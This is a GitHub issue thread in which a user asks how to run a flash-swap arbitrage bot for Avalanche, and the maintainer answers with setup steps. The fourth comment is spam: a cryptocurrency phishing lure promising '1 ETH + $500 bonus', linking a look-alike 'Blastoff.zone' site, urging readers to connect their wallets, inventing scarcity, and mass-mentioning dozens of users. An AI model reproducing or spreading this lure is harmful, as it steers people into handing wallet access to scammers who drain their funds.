### ISSUE TITLE
how to excute after install yarn

### ISSUE THREAD

**Issue by gsngsn123** [cjthoma1/flashswap-arbitrage-avalanche#9]
how to excute after install yarn

**Comment by TheTpyicalCoder** [comment]
I don't know, I will ask the creator.

**Comment by cjthoma1** [comment]
@gsngsn123 @TheTpyicalCoder Just updated the README with the following steps. Hopefully, this helps.

- Create a .env file 
- Add the variablel METAMASK_PRIVATE_KEY=<your key>
- Run yarn
- Run bot (yarn run arb:pangolin:joe:wavax:usdt --network mainnet)

**Comment by chugo-admin** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
b4ping, @takuseno, @Rcperez, @honpery, @srishilesh, @Karim-Megahed, @rselimh, @carlos-ssh, @OJayStewart, @vyzaldysanchez, @xiaoguangspeed, @dg92, @lastmjs, @muff-in, @chendehai, @gerardma, @jallen-dev, @javadnikbakht, @ft-john, @jimmytuc, @naripok, @m3nsr3a, @gene-smith, @mikestaub, @adrian-pusty, @UltimoTG, @laozl, @bchainbuidler, @agawish, @rangersinfull, @sstoner, @mysterick, @alpdogan, @dragon753, @ferasalsaab, @0xwilliampeter, @mmacedoeu, @antwaanh, @LonSilent, @pmanni02, @abhiram11, @tommy-ca, @AlexMills0, @karenirenecano, @jearangoo, @Gajesh2007, @Speerfish, @90tech, @LIU9293, @belsonheng
